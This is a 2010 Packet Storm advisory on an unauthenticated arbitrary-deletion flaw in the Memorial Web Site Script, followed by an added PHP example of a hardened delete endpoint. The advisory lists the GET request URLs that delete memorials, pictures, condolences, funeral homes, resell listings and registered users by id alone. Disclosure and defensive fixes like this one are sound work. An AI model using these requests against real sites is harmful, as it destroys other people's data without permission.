Memorial Web Site Script Arbitrary Deletion

24 Apr 2010 | Reported by Chip D3 Bi0s | Type: packetstorm | Source: packetstormsecurity.com

An arbitrary deletion vulnerability in the Easy Scripts Memorial Web Site Script allows unauthorized users to delete memorials, pictures, condolences, funeral homes, resell, and registered users.

Code
`-----------------------------------------------------------------------------------------  
Memorial Web Site Script Multiple Arbitrary Delete Vuln  
-----------------------------------------------------------------------------------------  
  
Author : Chip D3 Bi0s  
Email : chipdebios[alt+64]gmail.com  
Where : From Remote  
Team : LatinHackTeam  
  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Author : Easy Scripts  
Price : $49  
Vendor : http://www.easy-scripts.net  
  
description Bug:  
~~~~~~~~~~~~~~~  
After seeing v3n0m's bug:  
http://www.exploit-db.com/exploits/12351  
  
I kept looking at some things and  
discovered that it was possible to delete things published by a registered user,  
and even delete registered users :)  
To do so, we must first get the id of the registered user.  
It has this form in some of their publications:  
  
http://127.0.0.1/[path]/show_memorial.php?id=100  
  
  
Then, with only the id, one can delete all these things:  
Memorials, Pictures, Multiple Pictures, Condolences,  
Funeral homes, Resell & Delete Users  
  
All this is explained below:  
  
  
-------------------  
Delete Memorials  
http://127.0.0.1/[path]/admin/delete_mem.php?id=100  
  
------------------  
Delete Pictures  
http://127.0.0.1/[path]/admin/delete_pic.php?id=100  
  
  
  
in case of multiple images  
View Source on the pole is thus  
  
var preloadedimages=new Array();  
var timeoutId;  
  
photos[0]="pictures/1158372383_0_sub.JPG";  
names[0]="";  
photos[1]="pictures/1158372858_0_sub.JPG";  
names[1]="Mon&Dad";  
photos[2]="pictures/1158372975_0_sub.JPG";  
names[2]="Cementry";  
photos[3]="pictures/1158373106_0_sub.JPG";  
names[3]="Dad&Tommy";  
photos[4]="pictures/1158373106_1_sub.JPG";  
names[4]="Dad&Steve";  
photos[5]="pictures/1158373335_0_sub.JPG";  
names[5]="";  
photos[6]="pictures/1158375471_0_sub.JPG";  
names[6]="Dad7Minoo&Homa";  
  
Delete Multiple Pictures  
  
http://127.0.0.1/[path]/admin/del_im.php?id=100&name=1158375471_0_sub.JPG  
-------------------  
  
Delete Condolences  
http://127.0.0.1/[path]/dmin/delete_con.php?id=100  
  
-------------  
Delete Funeral homes  
http://127.0.0.1/[path]/admin/delete_fh.php?id=100  
  
  
--------  
Delete Resell  
http://127.0.0.1/[path]/admin/delete_resell.php?id=100  
  
---------  
Delete Users  
http://127.0.0.1/[path]/admin/delete_user.php?id=100  
  
  
  
+++++++++++++++++++++++++++++++++++++++  
#[!] Produced in South America  
+++++++++++++++++++++++++++++++++++++++  
`
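
The advisory shows deletion driven only by an `id` in a GET URL. The following is an added example of a hardened delete endpoint, not code from Easy Scripts or from the advisory's author; the session keys (`user_id`, `is_admin`, `csrf`), the SQLite DSN and the `memorials.owner_id` column are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example; not code from Memorial Web Site Script. Session keys, the
// DSN and the memorials.owner_id column are assumptions for illustration.

/** Returns the HTTP status for a delete request: 200 means it may proceed. */
function check_delete(string $method, array $session, array $post, ?int $ownerId): int
{
    if ($method !== 'POST') {
        return 405; // deletion must not be reachable through a plain GET link
    }
    if (empty($session['user_id'])) {
        return 401; // no authenticated session
    }
    $known = $session['csrf'] ?? null;
    $sent  = $post['csrf'] ?? null;
    if (!is_string($known) || !is_string($sent) || !hash_equals($known, $sent)) {
        return 403; // missing or wrong anti-CSRF token
    }
    if ($ownerId === null) {
        return 404; // no such record
    }
    if (empty($session['is_admin']) && (int)$session['user_id'] !== $ownerId) {
        return 403; // logged in, but neither admin nor the record's owner
    }
    return 200;
}

session_start();
$id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if (!is_int($id)) {            // null (absent) or false (not a positive integer)
    http_response_code(400);
    exit;
}
$pdo = new PDO('sqlite:' . __DIR__ . '/memorial.db'); // assumed DSN
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$stmt = $pdo->prepare('SELECT owner_id FROM memorials WHERE id = ?');
$stmt->execute([$id]);
$owner = $stmt->fetchColumn(); // false when the row does not exist

$status = check_delete($_SERVER['REQUEST_METHOD'], $_SESSION, $_POST,
                       $owner === false ? null : (int)$owner);
if ($status !== 200) {
    http_response_code($status);
    exit;
}
$pdo->prepare('DELETE FROM memorials WHERE id = ?')->execute([$id]);
http_response_code(204);
```

The same check applies to each delete endpoint the advisory lists; only the table and the ownership lookup change.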
